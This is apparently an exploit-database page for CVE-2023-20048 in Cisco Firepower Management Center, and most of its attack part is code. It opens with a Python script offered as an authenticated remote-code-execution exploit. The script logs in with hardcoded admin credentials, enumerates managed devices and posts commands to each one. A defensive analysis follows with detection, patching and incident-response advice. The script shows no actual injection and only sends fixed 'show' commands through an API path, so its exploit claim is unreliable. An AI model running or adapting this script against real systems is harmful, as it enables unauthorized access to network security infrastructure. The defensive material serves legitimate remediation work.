Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE

Exploit Author: Abdualhadi khalifa Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2024-03-12

# Exploit Title: [Cisco Firepower Management Center]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [6.2.3.18", "6.4.0.16", "6.6.7.1]
# CVE : [CVE-2023-20048]

import requests
import json

# set the variables for the URL, username, and password for the FMC web services interface
fmc_url = "https://fmc.example.com"
fmc_user = "admin"
fmc_pass = "cisco123"

# create a requests session to handle cookies and certificate verification
session = requests.Session()
session.verify = False

# send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token
token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken"
response = session.post(token_url, auth=(fmc_user, fmc_pass))

# check the response status and extract the access token and refresh token from the response headers
# set the access token as the authorization header for the subsequent requests
try:
    if response.status_code == 200:
        access_token = response.headers["X-auth-access-token"]
        refresh_token = response.headers["X-auth-refresh-token"]
        session.headers["Authorization"] = access_token
    else:
        print("Failed to get tokens, status code: " + str(response.status_code))
        exit()
except Exception as e:
    print(e)
    exit()

# set the variable for the domain id
# change this to your domain id
domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f"

# send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC
devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords"
response = session.get(devices_url)

# check the response status and extract the data as a json object
try:
    if response.status_code == 200:
        data = response.json()
    else:
        print("Failed to get devices, status code: " + str(response.status_code))
        exit()
except Exception as e:
    print(e)
    exit()

# parse the data to get the list of device names and URLs
devices = []
for item in data["items"]:
    device_name = item["name"]
    device_url = item["links"]["self"]
    devices.append((device_name, device_url))

# loop through the list of devices and send a GET request to the URL of each device to get the device details
for device in devices:
    device_name, device_url = device
    response = session.get(device_url)

    # check the response status and extract the data as a json object
    try:
        if response.status_code == 200:
            data = response.json()
        else:
            print("Failed to get device details, status code: " + str(response.status_code))
            continue
    except Exception as e:
        print(e)
        continue

    # parse the data to get the device type, software version, and configuration URL
    device_type = data["type"]
    device_version = data["metadata"]["softwareVersion"]
    config_url = data["metadata"]["configURL"]

    # check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability
    # use the values from the affected products section in the security advisory
    if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:
        print("Device " + device_name + " is vulnerable to CVE-2023-20048")

        # create a list of commands that you want to execute on the device
        commands = ["show version", "show running-config", "show interfaces"]
        device_id = device_url.split("/")[-1]

        # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device
        # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute
        for command in commands:
            command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command
            response = session.post(command_url)

            # check the response status and extract the data as a json object
            try:
                if response.status_code == 200:
                    data = response.json()
                else:
                    print("Failed to execute command, status code: " + str(response.status_code))
                    continue
            except Exception as e:
                print(e)
                continue

            # parse the data to get the result of the command execution and print it
            result = data["result"]
            print("Command: " + command)
            print("Result: " + result)

    else:
        print("Device " + device_name + " is not vulnerable to CVE-2023-20048")

Cisco Firepower Management Center (FMC) < 6.6.7.1 — Authenticated Remote Code Execution (CVE-2023-20048)

Summary

CVE-2023-20048 is an authenticated remote code execution (RCE) vulnerability affecting certain Cisco Firepower Management Center (FMC) releases. An attacker with valid FMC credentials and sufficient privileges can trigger execution of arbitrary commands on the FMC appliance, which may lead to full compromise of the management platform and downstream managed devices (FTD, ASA with FirePOWER). Cisco published a security advisory and released fixes; networks running vulnerable FMC versions should treat this as high severity.

Affected versions (representative)

Vendor advisories name multiple affected releases. Examples reported in public disclosures include:

6.2.3.18
6.4.0.16
6.6.7.1

Only vendor-provided advisories and your device inventory can definitively determine whether a specific appliance and build are affected. Apply the Cisco advisory and vendor-supplied patches for authoritative guidance.

Technical overview (high-level, non-actionable)

At a high level, this vulnerability allows an authenticated user with access to FMC management APIs or web UI to manipulate functionality that ultimately leads to execution of system-level commands. The root cause is in how certain management interfaces/processes handle user-supplied input, enabling an attacker to escalate from authenticated API/web access to arbitrary command execution on the FMC host. Because FMC centrally manages security devices, compromise of the FMC can have broad, high-impact consequences.

Impact and attack scenarios

Complete FMC compromise: attacker gains administrative shell access, can exfiltrate configuration and secrets (device credentials, API keys, logging endpoints).
Downstream device compromise: attacker can reconfigure or tamper with managed Firepower Threat Defense (FTD) and ASA with FirePOWER devices, install backdoors, or alter security policies.
Network pivoting and lateral movement: compromised FMC used as staging ground to attack internal networks and escalate privileges.
Operational disruption: attackers can disable detection, logging, or policy enforcement, causing blind spots for defenders.

Detection and safe reconnaissance

Defenders should inventory FMC instances, determine exact software builds, and look for signs of exploitation. Below are defensive actions and sample detection queries. Do not attempt to exploit systems; perform only authorized checks.

Safe detection script (read-only)

import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

FMC_URL = "https://fmc.example.com"    # change to your FMC host
USERNAME = "admin"                     # account with read access
PASSWORD = "REDACTED"                  # use secret store when possible
DOMAIN_ID = "e276abec-e0f2-11e3-8169-6d9ed49b625f"  # your FMC domain UUID

session = requests.Session()
session.verify = False

# Request an authentication token (read-only use)
token_url = f"{FMC_URL}/api/fmc_platform/v1/auth/generatetoken"
resp = session.post(token_url, auth=(USERNAME, PASSWORD))
if resp.status_code != 200:
    raise SystemExit(f"Token request failed: {resp.status_code}")

access_token = resp.headers.get("X-auth-access-token")
if not access_token:
    raise SystemExit("No access token received")

session.headers.update({"Authorization": access_token, "Content-Type": "application/json"})

# Get device records (read-only)
devices_url = f"{FMC_URL}/api/fmc_config/v1/domain/{DOMAIN_ID}/devices/devicerecords"
resp = session.get(devices_url)
resp.raise_for_status()

data = resp.json()
for item in data.get("items", []):
    name = item.get("name")
    version = item.get("metadata", {}).get("softwareVersion")
    device_id = item.get("id")
    print(f"{name}\t{device_id}\t{version}")

Explanation: The script performs only authenticated, read-only API calls to obtain an access token and list managed device records and reported software versions. It does not invoke operational endpoints or attempt command execution. Use this to build an accurate inventory and determine if any devices are running versions the vendor has listed as affected.

Log and telemetry hunting

Search FMC system logs for unexpected shell or process spawning events and unusual API calls outside normal maintenance windows.
Look for unexpected configuration changes pushed to managed devices (new access rules, changed NAT/ACLs, unexpected policy changes).
Check for new or modified user accounts, especially accounts with elevated roles, and for API token creation or refresh events at unusual times.
Network-level detection: watch for management-plane traffic from FMC to unknown endpoints; unusual outbound connections from FMC may indicate compromise.

Mitigation and remediation

Patch immediately: apply Cisco's security updates for FMC. Vendor advisories list fixed versions—upgrade to the patched builds recommended by Cisco.
If patching is delayed: restrict network access to FMC management interfaces (ACLs, management VRFs), limit which IPs can reach the API/UI, and use VPNs or jump hosts for admin access.
Enforce strong authentication: require multi-factor authentication (MFA) for administrative accounts and use unique, strong credentials for API accounts.
Least privilege: restrict accounts to the minimum necessary privileges; avoid using shared admin accounts.
Rotate credentials and keys: rotate passwords, device credentials, and API tokens stored on FMC after remediation or suspected compromise.
Enable and monitor logging: ensure FMC audit logging is enabled, collect logs centrally, and retain telemetry for forensic analysis.
Harden management plane: disable unused services, remove unnecessary administrative accounts, and apply configuration hardening recommended by Cisco.

Prioritized remediation table

Action	Priority	Notes
Apply vendor patches	Critical	Follow Cisco advisory; schedule immediate maintenance.
Isolate FMC from non-admin networks	High	Restrict management access with ACLs or network segmentation.
Rotate credentials & API keys	High	Assume compromise if signs exist; rotate and revoke tokens.
Hunt and review logs	High	Look for indicators of exploitation and lateral movement.
Restore from known-good backup (if compromised)	High	Prefer rebuild from trusted images over in-place remediation when compromise confirmed.

Incident response guidance (if compromise suspected)

Isolate the appliance from production networks and preserve forensic artifacts (disk/image, logs, API audit trails).
Collect and centralize logs from FMC and managed devices for correlation.
Rotate all secrets stored on the FMC (device credentials, API keys, certificates) and any credentials exposed to the appliance.
Conduct a full integrity assessment of FMC and managed devices; consider factory reset/rebuild from known-good images if root compromise is suspected.
Coordinate with Cisco TAC and follow their incident handling guidance; consider involving external DFIR experts for deep compromises.
Report incidents to appropriate organizational and regulatory stakeholders as required.

Best practices and long-term hardening

Maintain an accurate asset inventory and automated patching program for critical infrastructure appliances.
Limit management plane exposure: put management interfaces on isolated networks or management VLANs and enforce strict access controls.
Use centralized secrets management for credentials and integrate FMC with identity providers for SSO and MFA where supported.
Regularly audit roles and privileges within FMC and remove or disable unused accounts.
Test backups and disaster recovery plans for management infrastructure frequently.

References and resources

Cisco Security Advisory — refer to the official Cisco advisory for CVE-2023-20048 for patch details and fixed release numbers.
Vendor-specific hardening guides — Cisco provides FMC/FTD hardening documentation and best practices; follow those for configuration guidance.
Organizational patch management and incident response playbooks — integrate FMC patching into change control and IR processes.

Important: The above content is intended for defensive, remediation, and detection purposes only. Do not use testing or discovery methods against systems you do not own or are not authorized to test. For detailed, product-specific remediation steps, consult the official Cisco advisory and contact Cisco TAC.